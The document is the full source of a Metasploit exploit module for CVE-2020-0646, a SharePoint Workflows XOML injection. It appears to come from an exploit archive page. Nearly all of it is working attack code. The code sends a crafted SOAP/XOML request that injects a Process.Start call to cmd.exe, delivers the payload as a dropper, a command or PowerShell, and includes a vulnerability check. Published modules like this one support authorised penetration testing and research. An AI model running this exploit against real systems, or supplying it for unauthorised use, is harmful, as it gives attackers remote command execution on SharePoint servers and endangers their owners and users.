SharePoint Workflows XOML Injection

This Metasploit module exploits a vulnerability within SharePoint and its .NET backend that allows an attacker to execute commands using specially crafted XOML data sent to SharePoint via the Workflows functionality.


MD5 | 5b6ade0c1b4442dfc1e0314f571595ad

# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework

class MetasploitModule < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
include Msf::Exploit::Powershell
include Msf::Exploit::Remote::AutoCheck

def initialize(info = {})
super(update_info(info,
'Name' => 'SharePoint Workflows XOML Injection',
'Description' => %q{
This module exploits a vulnerability within SharePoint and its .NET backend
that allows an attacker to execute commands using specially crafted XOML data
sent to SharePoint via the Workflows functionality.
},
'Author' => [
'Spencer McIntyre',
'Soroush Dalili'
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2020-0646'],
['URL', 'https://www.mdsec.co.uk/2020/01/code-injection-in-workflows-leading-to-sharepoint-rce-cve-2020-0646/']
],
'Platform' => 'win',
'Targets' => [
[ 'Windows EXE Dropper', { 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :windows_dropper } ],
[ 'Windows Command', { 'Arch' => ARCH_CMD, 'Type' => :windows_command, 'Space' => 3000 } ],
[ 'Windows Powershell',
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :windows_powershell
]
],
'DefaultOptions' => {
'RPORT' => 443,
'SSL' => true
},
'DefaultTarget' => 0,
'DisclosureDate' => '2020-03-02',
'Notes' =>
{
'Stability' => [CRASH_SAFE,],
'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
'Reliability' => [REPEATABLE_SESSION],
},
'Privileged' => true
))

register_options([
OptString.new('TARGETURI', [ true, 'The base path to the SharePoint application', '/' ]),
OptString.new('DOMAIN', [ true, 'The domain to use for Windows authentication', 'WORKGROUP' ]),
OptString.new('USERNAME', [ true, 'Username to authenticate as', '' ]),
OptString.new('PASSWORD', [ true, 'The password to authenticate with' ])
])
end

def check
res = execute_command("echo #{Rex::Text.rand_text_alphanumeric(4 + rand(8))}")
return CheckCode::Unknown('Did not receive an HTTP 200 OK response') unless res&.code == 200

compiler_errors = extract_compiler_errors(res)
return CheckCode::Unknown('No compiler errors were reported') unless compiler_errors&.length > 0

# once patched you get a specific compiler error message about the type name
return CheckCode::Safe if compiler_errors[0].to_s =~ /is not a valid language-independent type name/

CheckCode::Vulnerable
end

def extract_compiler_errors(res)
return nil unless res&.code == 200

xml_doc = res.get_xml_document
result = xml_doc.search('//*[local-name()=\'ValidateWorkflowMarkupAndCreateSupportObjectsResult\']').text
return nil if result.length == 0

xml_result = Nokogiri::XML(result)
xml_result.xpath('//CompilerError/@Text')
end

def exploit
# NOTE: Automatic check is implemented by the AutoCheck mixin
super

case target['Type']
when :windows_command
execute_command(payload.encoded)
when :windows_dropper
cmd_target = targets.select {|target| target['Type'] == :windows_command}.first
execute_cmdstager({linemax: cmd_target.opts['Space']})
when :windows_powershell
execute_command(cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true))
end
end

def escape_command(cmd)
# a bunch of characters have to be escaped, so use a whitelist of those that are allowed and escape the rest as unicode
cmd.gsub(/([^a-zA-Z0-9 $:;\-\.=\[\]\{\}\(\)])/) { |x| "\\u%.4x" %x.unpack('C*')[0] }
end

def execute_command(cmd, opts = {})
xoml_data = <<-EOS
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<ValidateWorkflowMarkupAndCreateSupportObjects xmlns="http://microsoft.com/sharepoint/webpartpages">
<workflowMarkupText>
<![CDATA[
<SequentialWorkflowActivity x:Class="MyWorkflow" x:Name="foobar" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/workflow">
<CallExternalMethodActivity x:Name="foo" MethodName='test1' InterfaceType='System.String);}Object/**/test2=System.Diagnostics.Process.Start("cmd.exe", "/c #{escape_command(cmd)}");private/**/void/**/foobar(){//' />
</SequentialWorkflowActivity>
]]>
</workflowMarkupText>
<rulesText></rulesText>
<configBlob></configBlob>
<flag>2</flag>
</ValidateWorkflowMarkupAndCreateSupportObjects>
</soap:Body>
</soap:Envelope>
EOS

res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, '_vti_bin', 'webpartpages.asmx'),
'ctype' => 'text/xml; charset=utf-8',
'data' => xoml_data,
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
})

unless res&.code == 200
print_error('Non-200 HTTP response received while trying to execute the command')
end

res
end
end

Related Posts